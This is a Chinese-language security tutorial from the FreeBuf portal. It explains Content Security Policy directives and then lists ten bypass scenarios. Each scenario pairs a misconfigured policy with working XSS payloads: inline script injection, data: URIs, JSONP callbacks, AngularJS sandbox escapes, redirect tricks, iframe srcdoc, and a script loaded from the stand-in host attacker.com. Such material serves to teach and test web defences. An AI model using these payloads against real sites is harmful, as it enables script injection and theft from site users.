官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序
CSP策略原理&&绕过方法
CSP策略是什么
CSP策略是一个机制,定义了哪些资源可以被当前的web页面加载,其实还是浏览器机制。这里的资源包括脚本、图片、iframe等,CSP策略的规则通过响应头或者html中的meta标签来指定,浏览器会根据这些策略来限制或者阻止这些行为。
CSP策略如何使用
CSP策略广泛用于内容注入,能有效防御XSS漏洞,但是有个原则CSP不能作为防御XSS漏洞的方案,只能作为减缓方法。比如有个CSP策略IE浏览器不支持,这时候防御方法就完全失效。
如何使用CSP
通过响应头来设置
Content-Security-policy: default-src 'self'; script-src 'self' allowed.com; img-src 'self' allowed.com; style-src 'self';
通过meta标签来设置
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
常用标签的说明
script-src : 这个标签指明从哪儿加载javascript,这个包括两个方面,一个是<script>一个是内联的script,比如 <img onerror=>,这个标签阻止了大部分的恶意的script加载
default-src :这个标签指明了默认加载的资源,当一些标签没有定义的时候,使用这个标签定义的缺省值。
Child-src :这个标签定义了允许用于web workers和嵌入式框架的内容资源。
connect-src :这个标签定义了像<a>、websocket、XMLHttpRequest连接的目标链接。
frame-src :这个标签定义了frame框架加载的资源
img-src :这个标签定义了img标签加载的资源
object-src : 这个标签定义了 <object>,<embed>, <applet>加载的资源
base-url : 这个标签定义了<base>标签设置的值
form-action : 这个标签定义了执行提交后提交的目的地址
sanbox :沙箱指令为请求的资源启用沙箱,类似于<iframe>沙箱属性。 它将限制应用于页面的操作,包括阻止弹出窗口,阻止插件和脚本的执行以及执行同源策略。
常用标签值说明
* : 这是通配符,允许所有的URL
self :这个值允许从同domain加载资源
data :这个值允许通过data schema的方式加载资源
none : 这个值不允许从任何源加载任何内容
unsafe-eval :这个值允许执行eval()和类似函数
unsafe-hashes :这允许启用特定的内联事件处理程序。
unsafe-inline :这允许使用内联资源,例如内联<script>元素,javascript:URL,内联事件处理程序和内联<style>元素。
nonce :脚本执行白名单,给每个脚本添加了一个一次性随机数,执行脚本前和保存在浏览中的数值匹配,匹配不上不执行。
一些使用示例
这里摘抄网络
Content-Security-Policy: default-src 'self'; script-src https://bhaveshthakur.com; report-uri /Report-parsing-url;
This image will be allowed as image is loading from same domain i.e. bhaveshthakur.com<script src=script.js>This script will be allowed as the script is loading from the same domain i.e. bhaveshthakur.com
<script src=https://evil.com/script.js> This script will not-allowed as the script is trying to load from undefined domain i.e. evil.com"/><script>alert(1337)</script>This will not-allowed on the page. But why? Because inline-src is set to self.
But Wait! where the hell it is mentioned? I can't see inline-src defined in above CSP at all.
The answer is have you noticed default-src 'self'? So even other directives are not defined but they will be following default-src directive value only. Below is the list of directives which will follow default-src value even though they are not defined in the policy:
child-src connect-src font-src frame-src img-src manifest-src media-src object-src prefetch-src script-src script-src-elem script-src-attr style-src style-src-elem style-src-attr worker-src
常见的绕过方法和思路
场景1,可以执行内联脚本:
Content-Security-Policy: script-src https://facebook.com https://google.com 'unsafe-inline' https://*; child-src 'none'; report-uri /Report-parsing-url;
working payload : "/><script>alert(1337);</script>
场景2,可以执行unsafe-eval :
Content-Security-Policy: script-src https://facebook.com https://google.com 'unsafe-eval' data: http://*; child-src 'none'; report-uri /Report-parsing-url;
working payload :
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
场景3,误配置使用通配符 :
Content-Security-Policy: script-src 'self' https://facebook.com https://google.com https: data *; child-src 'none'; report-uri /Report-parsing-url;
working payloads :
"/>'><script src=https://attacker.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
场景4,设置了object-src,但是未指定default-src :
Content-Security-Policy: script-src 'self' report-uri /Report-parsing-url;
working payloads :
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
场景5,结合文件上传,上传恶意js脚本,利用同源的恶意js :
Content-Security-Policy: script-src 'self'; object-src 'none' ; report-uri /Report-parsing-url;
working payloads :
"/>'><script src="/user_upload/mypic.png.js"></script>
场景6,利用jsonp构造回调函数 :
Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none' ; report-uri /Report-parsing-url;
working payload :
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
场景7,设置了源为javascript代码,利用代码库中的漏洞代码 :
Content-Security-Policy: script-src 'self' https://cdnjs.cloudflare.com/; object-src 'none' ; report-uri /Report-parsing-url;
working payloads :
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
<div ng-app ng-csp>
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
</div>
"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
场景8,使用angular js,利用其中的漏洞代码:
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
working payloads :
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
场景9,利用CSP不检测重定向的特点,加载重定向的源:
Content-Security-Policy: script-src 'self' accounts.google.com/random/ website.with.redirect.com ; object-src 'none' ; report-uri /Report-parsing-url;
working payload :
">'><script src="https://website.with.redirect.com/redirect?url=https%3A//accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>">
场景10,利用iframe加载恶意的内容:
Content-Security-Policy:
default-src 'self' data: *; connect-src 'self'; script-src 'self' ;
report-uri /_csp; upgrade-insecure-requests
working payloads :
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
* sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
请登录/注册后在FreeBuf发布内容哦